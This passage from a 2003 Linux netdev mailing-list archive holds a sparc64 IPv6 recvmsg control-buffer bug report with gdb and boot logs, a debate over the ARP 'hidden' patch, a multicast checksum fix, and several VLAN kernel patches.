port 4747, we get the following result: clen_init=32 clen=28 flags=8 when we change controllen to 33, we get: clen_init=33 clen=32 flags=8 and finally to 36: clen_init=36 clen=32 flags=0 this case is not so critical, it just truncates something what it should not, but the following happened while debugging bind: 898 cc = recvmsg(sock->fd, &msghdr, 0); (gdb) print msghdr $37 = {msg_name = 0x15c2b4, msg_namelen = 28, msg_iov = 0xeffff658, msg_iovlen = 1, msg_control = 0xeffff600, msg_controllen = 52, msg_flags = 0} (gdb) next 899 recv_errno = errno; (gdb) print msghdr $38 = {msg_name = 0x0, msg_namelen = 28, msg_iov = 0xeffff658, msg_iovlen = 1, msg_control = 0xeffff600, msg_controllen = 60, msg_flags = 8} (gdb) x/13 msghdr->msg_control 0xeffff600: 0x00000014 0x0000ffff 0x0000001d 0x3f251d01 0xeffff610: 0x000bb770 0x00000010 0x00000029 0x00000002 0xeffff620: 0x3ffe80ee 0x00000018 0xeffff658 0x00000001 0xeffff630: 0xeffff600 msg_controllen was increased by kernel the source address of packet was 3ffe:80ee:3bd:0:a00:20ff:fec9:3aad, not 3ffe:80ee:0000:0018:efff:f658:0000:0001 when tried on x86 platform, it worked fine and once, when i compiled bind with -O0, kernel crashed i am using: Linux ns2 2.4.22-pre6 #2 Wed Jul 16 22:34:00 CEST 2003 sparc64 sun4u TI UltraSparc II (BlackBird) GNU/Linux (same results on stable 2.4.21) dmesg output: PROMLIB: Sun IEEE Boot Prom 3.23.1 1999/07/16 12:08 Linux version 2.4.22-pre6 (root@ns1) (gcc version egcs-2.92.11 19980921 (gcc2 ss-980609 experimental)) #2 Wed Jul 16 22:34:00 CEST 2003 ARCH: SUN4U Ethernet address: 08:00:20:c9:3a:ad On node 0 totalpages: 65080 zone(0): 65421 pages. zone(1): 0 pages. zone(2): 0 pages. Found CPU 0 (node=f006d624,mid=0) Found 1 CPU prom device tree node(s). Kernel command line: root=/dev/sda2 sym53c8xx=excl:0x7d9 Calibrating delay loop... 
897.84 BogoMIPS Memory: 514456k available (1592k kernel code, 280k data, 128k init) [fffff80000000000,00000000bff1a000] Dentry cache hash table entries: 65536 (order: 7, 1048576 bytes) Inode cache hash table entries: 32768 (order: 6, 524288 bytes) Mount cache hash table entries: 512 (order: 0, 8192 bytes) Buffer cache hash table entries: 32768 (order: 5, 262144 bytes) Page-cache hash table entries: 65536 (order: 6, 524288 bytes) POSIX conformance testing by UNIFIX PCI: Probing for controllers. PCI: Found PSYCHO, control regs at 000001fe00000000 PSYCHO: Shared PCI config space at 000001fe01000000 PCI-IRQ: Routing bus[ 0] slot[ 1] map[0] to INO[21] PCI-IRQ: Routing bus[ 0] slot[ 3] map[0] to INO[20] PCI-IRQ: Routing bus[ 0] slot[ 3] map[0] to INO[26] PCI-IRQ: Routing bus[ 0] slot[ 4] map[0] to INO[18] PCI-IRQ: Routing bus[ 0] slot[ 4] map[0] to INO[19] PCI0(PBMB): Bus running at 33MHz PCI-IRQ: Routing bus[ 1] slot[ 1] map[0] to INO[00] PCI0(PBMA): Bus running at 33MHz ebus0: [auxio] [power] [SUNW,pll] [sc] [se] [su] [su] [ecpp] [fdthree] [eeprom] [flashprom] PCIO serial driver version 1.54 su(mouse) at 0x1fff13062f8 (irq = 4,7ea) is a 16550A Sun Mouse-Systems mouse driver version 1.00 su(kbd) at 0x1fff13083f8 (irq = 9,7e9) is a 16550A keyboard: not present power: Control reg at 000001fff1724000 ... not using powerd. Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket Starting kswapd Journalled Block Device driver loaded devfs: v1.12c (20020818) Richard Gooch (rgooch@atnf.csiro.au) devfs: boot_options: 0x1 Console: switching to frame buffer device fb0: Permedia2 PCI board (Permedia2), using 8192K of video memory. rtc_init: no PC rtc found Software Watchdog Timer: 0.05, timer margin: 60 sec NET4: Frame Diverter 0.46 sunhme.c:v2.01 26/Mar/2002 David S. 
Miller (davem@redhat.com) divert: allocating divert_blk for eth0 eth0: HAPPY MEAL (PCI/CheerIO) 10/100BaseT Ethernet 08:00:20:c9:3a:ad SCSI subsystem driver Revision: 1.00 sym.0.3.0: setting PCI_COMMAND_INVALIDATE. sym.0.3.1: setting PCI_COMMAND_PARITY... sym.0.3.1: setting PCI_COMMAND_INVALIDATE. sym.0.4.0: setting PCI_COMMAND_PARITY... sym.0.4.0: setting PCI_COMMAND_INVALIDATE. sym.0.4.1: setting PCI_COMMAND_PARITY... sym.0.4.1: setting PCI_COMMAND_INVALIDATE. sym0: <875> rev 0x14 on pci bus 0 device 3 function 0 irq 4,7e0 sym0: No NVRAM, ID 7, Fast-20, SE, parity checking sym0: SCSI BUS has been reset. sym1: <875> rev 0x14 on pci bus 0 device 3 function 1 irq 4,7e6 sym1: No NVRAM, ID 7, Fast-20, SE, parity checking sym1: SCSI BUS has been reset. sym2: <875> rev 0x14 on pci bus 0 device 4 function 0 irq 4,7d8 sym2: No NVRAM, ID 7, Fast-20, SE, parity checking sym2: SCSI BUS has been reset. sym3: <875> rev 0x14 on pci bus 0 device 4 function 1 irq 4,7d9 sym3: No NVRAM, ID 7, Fast-20, SE, parity checking sym3: SCSI BUS has been reset. scsi0 : sym-2.1.17a scsi1 : sym-2.1.17a scsi2 : sym-2.1.17a scsi3 : sym-2.1.17a Vendor: SEAGATE Model: ST318404LSUN18G Rev: 4207 Type: Direct-Access ANSI SCSI revision: 03 Vendor: TOSHIBA Model: XM6201TASUN32XCD Rev: 1103 Type: CD-ROM ANSI SCSI revision: 02 sym0:0:0: tagged command queuing enabled, command queue depth 16. Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 sym0:0: FAST-20 WIDE SCSI 40.0 MB/s ST (50.0 ns, offset 16) SCSI device sda: 35378533 512-byte hdwr sectors (18114 MB) Partition check: /dev/scsi/host0/bus0/target0/lun0: p1 p2 p3 p4 p5 Initializing Cryptographic API NET4: Linux TCP/IP 1.0 for NET4.0 IP Protocols: ICMP, UDP, TCP, IGMP IP: routing cache hash table of 8192 buckets, 64Kbytes TCP: Hash tables configured (established 65536 bind 32768) Linux IP multicast router 0.06 plus PIM-SM NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. kjournald starting. 
Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Mounted devfs on /dev Warning: unable to open an initial console. Adding Swap: 530080k swap-space (priority -1) EXT3 FS 2.4-0.9.19, 19 August 2002 on sd(8,2), internal journal IPv6 v0.8 for NET4.0 IPv6 over IPv4 tunneling driver divert: not allocating divert_blk for non-ethernet device sit0 kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.19, 19 August 2002 on sd(8,5), internal journal EXT3-fs: mounted filesystem with ordered data mode. divert: not allocating divert_blk for non-ethernet device xs26 eth0: Link is up using internal transceiver at 100Mb/s, Full Duplex. Best Regards, -- Jan Oravec XS26 coordinator 6COM s.r.o. 'Access to IPv6' http://www.6com.sk http://www.xs26.net From kernel@theoesters.com Mon Jul 28 10:10:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 10:10:06 -0700 (PDT) Received: from mail.theoesters.com (nobody@adsl-67-120-171-161.dsl.lsan03.pacbell.net [67.120.171.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SH9xFl007875 for ; Mon, 28 Jul 2003 10:10:00 -0700 Received: (qmail 13492 invoked by uid 0); 28 Jul 2003 17:09:59 -0000 Date: Mon, 28 Jul 2003 10:09:59 -0700 From: Phil Oester To: Carlos Velasco Cc: "David S. 
Miller" , marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-ID: <20030728100959.A13335@ns1.theoesters.com> References: <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> <200307280323020667.10D68954@192.168.128.16> <20030727183547.784b6ab5.davem@redhat.com> <200307281243530385.12D80171@192.168.128.16> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200307281243530385.12D80171@192.168.128.16>; from carlosev@newipnet.com on Mon, Jul 28, 2003 at 12:43:53PM +0200 X-archive-position: 4346 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kernel@theoesters.com Precedence: bulk X-list: netdev What I think David fails to realize is that in the real world, people use the hidden patch on a regular basis. It is the simplest way to achieve what we want to in a server farm consisting of hundreds of servers. It also involves the least overhead. And NO - I do not use IPVS. I use one of the many hardware based loadbalancers which work flawlessly with the hidden flag. Those in ivory towers can pontificate endlessly about how one 'should' fix the arp problem. Those in the trenches will do it the easy way. Phil Oester > On 27/07/2003 at 18:35 David S. Miller wrote: > > >I don't deny that it fixes your problem, that is not what > >we're talking about. We're talking about how one should > >fix the problem, and I'm trying to show you why "hidden" > >patch is not the answer to that. 
From WWending@oerlikon.ca Mon Jul 28 10:20:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 10:20:39 -0700 (PDT) Received: from mail.oerlikon.ca ([207.236.123.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SHKWFl008486 for ; Mon, 28 Jul 2003 10:20:33 -0700 X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: multicast IP datagram forwarding bug and fix Date: Mon, 28 Jul 2003 13:20:31 -0400 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: multicast IP datagram forwarding bug and fix Thread-Index: AcNVKzM2n6nZ9yf3QoKw41OAI12Z9wAATw1w From: "Weng, Wending" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6SHKWFl008486 X-archive-position: 4347 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: WWending@oerlikon.ca Precedence: bulk X-list: netdev

> Hi,
>
> Linux doesn't forward a multicast IP datagram if it has option(s). There is a bug in the module ipmr.c, function
> ipmr_forward_finish. Below is the current version of this function:
>
> static inline int ipmr_forward_finish(struct sk_buff *skb)
> {
>         struct dst_entry *dst = skb->dst;
>
>         if (skb->len <= dst->pmtu)
>                 return dst->output(skb);
>         else
>                 return ip_fragment(skb, dst->output);
> }
>
> It forgets to recalculate the checksum when an option is modified.
>
> The following code works properly:
>
> static inline int ipmr_forward_finish(struct sk_buff *skb)
> {
>         struct dst_entry *dst = skb->dst;
>
>         ip_forward_options (skb); /* this line recalculates checksum if needed.
*/
>
>         if (skb->len <= dst->pmtu)
>                 return dst->output(skb);
>         else
>                 return ip_fragment(skb, dst->output);
> }
>
> Wending Weng

From bloemsaa@xs4all.nl Mon Jul 28 11:56:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 11:56:36 -0700 (PDT) Received: from smtpzilla3.xs4all.nl (smtpzilla3.xs4all.nl [194.109.127.139]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SIuRFl014495 for ; Mon, 28 Jul 2003 11:56:28 -0700 Received: from llewella (vialle.xs4all.nl [213.84.6.25]) by smtpzilla3.xs4all.nl (8.12.9/8.12.9) with SMTP id h6SIuNMc022284; Mon, 28 Jul 2003 20:56:24 +0200 (CEST) Message-ID: <00bd01c35539$f42491c0$cd01a8c0@llewella> From: "Bas Bloemsaat" To: "Carlos Velasco" Cc: , , References: <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> <200307280323020667.10D68954@192.168.128.16> <20030727183547.784b6ab5.davem@redhat.com> <200307281243530385.12D80171@192.168.128.16> <20030728100959.A13335@ns1.theoesters.com> Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Date: Mon, 28 Jul 2003 20:56:28 +0200 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-archive-position: 4348 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bloemsaa@xs4all.nl Precedence: bulk X-list: netdev

First of all, I'm sorry I started this. It was a genuine error on my side to assume I had stumbled on a bug, while it is in fact a hotly debated 'feature'. I did google for it, but must have missed it; finding it would have saved my weekend. I didn't want to (re)start a religious war.
Maybe we should let it rest for a bit, until we have something to discuss. Right now, I have the impression that people are talking about slightly different things.

> What I think David fails to realize is that in the real world, people
> use the hidden patch on a regular basis. It is the simplest way to
> achieve what we want to in a server farm consisting of hundreds of
> servers. It also involves the least overhead.

Myself included: I've downloaded it and use it now. It works fine for me and I don't see any problems. But I do not see the whole picture, and I don't think anybody fully understands the other camp's objections.

David, I hope that you will explain your side of the story, or maybe point to a webpage where it is explained clearly. I still have no idea what your objections are, other than that a different choice was made in the past.

Regards,
Bas

From shemminger@osdl.org Mon Jul 28 14:00:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 14:00:04 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SKxxFl022174 for ; Mon, 28 Jul 2003 14:00:00 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6SKxmI15650; Mon, 28 Jul 2003 13:59:48 -0700 Date: Mon, 28 Jul 2003 13:59:47 -0700 From: Stephen Hemminger To: "David S.
Miller" Cc: netdev@oss.sgi.com, bridge@osdl.org Subject: [PATCH] Change MAINTAINERS reference to bridge mailing list Message-Id: <20030728135947.4aa9ad06.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4349 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev List moved to osdl.org diff -Nru a/MAINTAINERS b/MAINTAINERS --- a/MAINTAINERS Mon Jul 28 13:57:06 2003 +++ b/MAINTAINERS Mon Jul 28 13:57:06 2003 @@ -666,7 +666,7 @@ ETHERNET BRIDGE P: Stephen Hemminger M: shemminger@osdl.org -L: bridge@math.leidenuniv.nl +L: bridge@osdl.org W: http://bridge.sourceforge.net/ S: Maintained From davem@redhat.com Mon Jul 28 14:02:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 14:02:54 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SL2mFl022628 for ; Mon, 28 Jul 2003 14:02:48 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id NAA30236; Mon, 28 Jul 2003 13:59:38 -0700 Date: Mon, 28 Jul 2003 13:59:38 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com, bridge@osdl.org Subject: Re: [PATCH] Change MAINTAINERS reference to bridge mailing list Message-Id: <20030728135938.38188485.davem@redhat.com> In-Reply-To: <20030728135947.4aa9ad06.shemminger@osdl.org> References: <20030728135947.4aa9ad06.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4350 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 13:59:47 -0700 Stephen Hemminger wrote: > List moved to osdl.org Applied, thanks. From shemminger@osdl.org Mon Jul 28 15:18:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 15:18:17 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SMICFl027937 for ; Mon, 28 Jul 2003 15:18:13 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6SMHjI03666; Mon, 28 Jul 2003 15:17:45 -0700 Date: Mon, 28 Jul 2003 15:17:45 -0700 From: Stephen Hemminger To: Ben Greear , "David S. 
Miller" Cc: "Linux 802.1Q VLAN" , netdev@oss.sgi.com Subject: [PATCH] typo in vlan debug code Message-Id: <20030728151745.54123f45.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4351 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev VLAN won't build with debug enabled. diff -Nru a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c --- a/net/8021q/vlan_dev.c Mon Jul 28 15:05:34 2003 +++ b/net/8021q/vlan_dev.c Mon Jul 28 15:05:34 2003 @@ -170,7 +170,7 @@ #ifdef VLAN_DEBUG printk(VLAN_DBG "%s: dropping skb: %p because came in on wrong device, dev: %s real_dev: %s, skb_dev: %s\n", - __FUNCTION__ skb, dev->name, + __FUNCTION__, skb, dev->name, VLAN_DEV_INFO(skb->dev)->real_dev->name, skb->dev->name); #endif From shemminger@osdl.org Mon Jul 28 15:21:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 15:21:32 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SMLRFl028419 for ; Mon, 28 Jul 2003 15:21:27 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6SMLFI04305; Mon, 28 Jul 2003 15:21:15 -0700 Date: Mon, 28 Jul 2003 15:21:14 -0700 From: Stephen Hemminger To: Ben Greear , "David S. 
Miller" Cc: "Linux 802.1Q VLAN" , netdev@oss.sgi.com Subject: [PATCH] Vlan convert stubs to no-ops Message-Id: <20030728152114.02a10f4e.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4352 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev When building without /proc, the interfaces can be converted to no-ops (very minor code savings). Patch for 2.6.0-test2 diff -Nru a/net/8021q/Makefile b/net/8021q/Makefile --- a/net/8021q/Makefile Mon Jul 28 15:05:58 2003 +++ b/net/8021q/Makefile Mon Jul 28 15:05:58 2003 @@ -4,4 +4,9 @@ obj-$(CONFIG_VLAN_8021Q) += 8021q.o -8021q-objs := vlan.o vlanproc.o vlan_dev.o +8021q-objs := vlan.o vlan_dev.o + +ifeq ($(CONFIG_PROC_FS),y) +8021q-objs += vlanproc.o +endif + diff -Nru a/net/8021q/vlanproc.c b/net/8021q/vlanproc.c --- a/net/8021q/vlanproc.c Mon Jul 28 15:05:58 2003 +++ b/net/8021q/vlanproc.c Mon Jul 28 15:05:58 2003 @@ -38,8 +38,6 @@ /****** Function Prototypes *************************************************/ -#ifdef CONFIG_PROC_FS - /* Proc filesystem interface */ static ssize_t vlan_proc_read(struct file *file, char *buf, size_t count, loff_t *ppos); @@ -438,32 +436,3 @@ return cnt; } - -#else /* No CONFIG_PROC_FS */ - -/* - * No /proc - output stubs - */ - -int __init vlan_proc_init (void) -{ - return 0; -} - -void vlan_proc_cleanup(void) -{ - return; -} - - -int vlan_proc_add_dev(struct net_device *vlandev) -{ - return 0; -} - -int vlan_proc_rem_dev(struct net_device *vlandev) -{ - return 0; -} - -#endif /* No CONFIG_PROC_FS */ diff -Nru a/net/8021q/vlanproc.h 
b/net/8021q/vlanproc.h --- a/net/8021q/vlanproc.h Mon Jul 28 15:05:58 2003 +++ b/net/8021q/vlanproc.h Mon Jul 28 15:05:58 2003 @@ -1,6 +1,7 @@ #ifndef __BEN_VLAN_PROC_INC__ #define __BEN_VLAN_PROC_INC__ +#ifdef CONFIG_PROC_FS int vlan_proc_init(void); int vlan_proc_rem_dev(struct net_device *vlandev); @@ -8,5 +9,14 @@ void vlan_proc_cleanup (void); #define VLAN_PROC_BUFSZ (4096) /* buffer size for printing proc info */ + +#else /* No CONFIG_PROC_FS */ + +#define vlan_proc_init() (0) +#define vlan_proc_cleanup() do {} while(0) +#define vlan_proc_add_dev(dev) ((void)(dev), 0) +#define vlan_proc_rem_dev(dev) ((void)(dev), 0) + +#endif #endif /* !(__BEN_VLAN_PROC_INC__) */ From shemminger@osdl.org Mon Jul 28 15:30:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 15:31:05 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SMUbFl029460 for ; Mon, 28 Jul 2003 15:30:38 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6SMUOI05545; Mon, 28 Jul 2003 15:30:24 -0700 Date: Mon, 28 Jul 2003 15:30:24 -0700 From: Stephen Hemminger To: Ben Greear , "David S. 
Miller" , "Linux 802.1Q VLAN" , netdev@oss.sgi.com Subject: [PATCH] convert VLAN to use seq_file for /proc Message-Id: <20030728153024.6b1d7cde.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4353 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Use seq_file interface for smaller, simpler, safer code in /proc. Output format is the same. Patch for 2.6.0-test2 with earlier proc patches diff -Nru a/net/8021q/vlanproc.c b/net/8021q/vlanproc.c --- a/net/8021q/vlanproc.c Mon Jul 28 15:28:36 2003 +++ b/net/8021q/vlanproc.c Mon Jul 28 15:28:36 2003 @@ -30,6 +30,7 @@ #include /* copy_to_user */ #include #include +#include #include #include #include @@ -38,28 +39,28 @@ /****** Function Prototypes *************************************************/ -/* Proc filesystem interface */ -static ssize_t vlan_proc_read(struct file *file, char *buf, size_t count, - loff_t *ppos); - /* Methods for preparing data for reading proc entries */ - -static int vlan_config_get_info(char *buf, char **start, off_t offs, int len); -static int vlandev_get_info(char *buf, char **start, off_t offs, int len); +static int vlan_seq_show(struct seq_file *seq, void *v); +static void *vlan_seq_start(struct seq_file *seq, loff_t *pos); +static void *vlan_seq_next(struct seq_file *seq, void *v, loff_t *pos); +static void vlan_seq_stop(struct seq_file *seq, void *); +static int vlandev_seq_show(struct seq_file *seq, void *v); /* Miscellaneous */ +#define SEQ_START_TOKEN ((void *) 1) + /* * Global Data */ + /* * Names of the proc directory entries 
*/ -static char name_root[] = "vlan"; -static char name_conf[] = "config"; -static char term_msg[] = "***KERNEL: Out of buffer space!***\n"; +static const char name_root[] = "vlan"; +static const char name_conf[] = "config"; /* * Structures for interfacing with the /proc filesystem. @@ -73,20 +74,41 @@ * Generic /proc/net/vlan/ file and inode operations */ +static struct seq_operations vlan_seq_ops = { + .start = vlan_seq_start, + .next = vlan_seq_next, + .stop = vlan_seq_stop, + .show = vlan_seq_show, +}; + +static int vlan_seq_open(struct inode *inode, struct file *file) +{ + return seq_open(file, &vlan_seq_ops); +} + static struct file_operations vlan_fops = { - .owner = THIS_MODULE, - .read = vlan_proc_read, - .ioctl = NULL, /* vlan_proc_ioctl */ + .owner = THIS_MODULE, + .open = vlan_seq_open, + .read = seq_read, + .llseek = seq_lseek, + .release = seq_release, }; /* * /proc/net/vlan/ file and inode operations */ +static int vlandev_seq_open(struct inode *inode, struct file *file) +{ + return single_open(file, vlandev_seq_show, PDE(inode)->data); +} + static struct file_operations vlandev_fops = { .owner = THIS_MODULE, - .read = vlan_proc_read, - .ioctl =NULL, /* vlan_proc_ioctl */ + .open = vlandev_seq_open, + .read = seq_read, + .llseek = seq_lseek, + .release = single_release, }; /* @@ -106,8 +128,12 @@ static struct proc_dir_entry *proc_vlan_conf; /* Strings */ -static char conf_hdr[] = "VLAN Dev name | VLAN ID\n"; - +static const char *vlan_name_type_str[VLAN_NAME_TYPE_HIGHEST] = { + [VLAN_NAME_TYPE_RAW_PLUS_VID] = "VLAN_NAME_TYPE_RAW_PLUS_VID", + [VLAN_NAME_TYPE_PLUS_VID_NO_PAD] = "VLAN_NAME_TYPE_PLUS_VID_NO_PAD", + [VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD]= "VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD", + [VLAN_NAME_TYPE_PLUS_VID] = "VLAN_NAME_TYPE_PLUS_VID", +}; /* * Interface functions */ @@ -142,7 +168,6 @@ proc_vlan_dir); if (proc_vlan_conf) { proc_vlan_conf->proc_fops = &vlan_fops; - proc_vlan_conf->get_info = vlan_config_get_info; return 0; } } @@ -172,7 +197,6 
@@ return -ENOBUFS; dev_info->dent->proc_fops = &vlandev_fops; - dev_info->dent->get_info = &vlandev_get_info; dev_info->dent->data = vlandev; #ifdef VLAN_DEBUG @@ -187,6 +211,7 @@ */ void vlan_proc_rem_dev(struct net_device *vlandev) { + #ifdef VLAN_DEBUG printk(VLAN_DBG __FUNCTION__ ": dev: %p\n", vlandev); #endif @@ -201,185 +226,103 @@ /****** Proc filesystem entry points ****************************************/ /* - * Read VLAN proc directory entry. - * This is universal routine for reading all entries in /proc/net/vlan - * directory. Each directory entry contains a pointer to the 'method' for - * preparing data for that entry. - * o verify arguments - * o allocate kernel buffer - * o call get_info() to prepare data - * o copy data to user space - * o release kernel buffer - * - * Return: number of bytes copied to user space (0, if no data) - * <0 error - */ -static ssize_t vlan_proc_read(struct file *file, char *buf, - size_t count, loff_t *ppos) -{ - struct inode *inode = file->f_dentry->d_inode; - struct proc_dir_entry *dent; - char *page; - int pos, offs, len; + * The following few functions build the content of /proc/net/vlan/config + */ - if (count <= 0) - return 0; +/* starting at dev, find a VLAN device */ +struct net_device *vlan_skip(struct net_device *dev) +{ + while (dev && !(dev->priv_flags & IFF_802_1Q_VLAN)) + dev = dev->next; - dent = PDE(inode); - if ((dent == NULL) || (dent->get_info == NULL)) - return 0; + return dev; +} - page = kmalloc(VLAN_PROC_BUFSZ, GFP_KERNEL); - VLAN_MEM_DBG("page malloc, addr: %p size: %i\n", - page, VLAN_PROC_BUFSZ); +/* start read of /proc/net/vlan/config */ +static void *vlan_seq_start(struct seq_file *seq, loff_t *pos) +{ + struct net_device *dev; + loff_t i = 1; - if (page == NULL) - return -ENOBUFS; + read_lock(&dev_base_lock); - pos = dent->get_info(page, dent->data, 0, 0); - offs = file->f_pos; - if (offs < pos) { - len = min_t(int, pos - offs, count); - if (copy_to_user(buf, (page + offs), len)) { - 
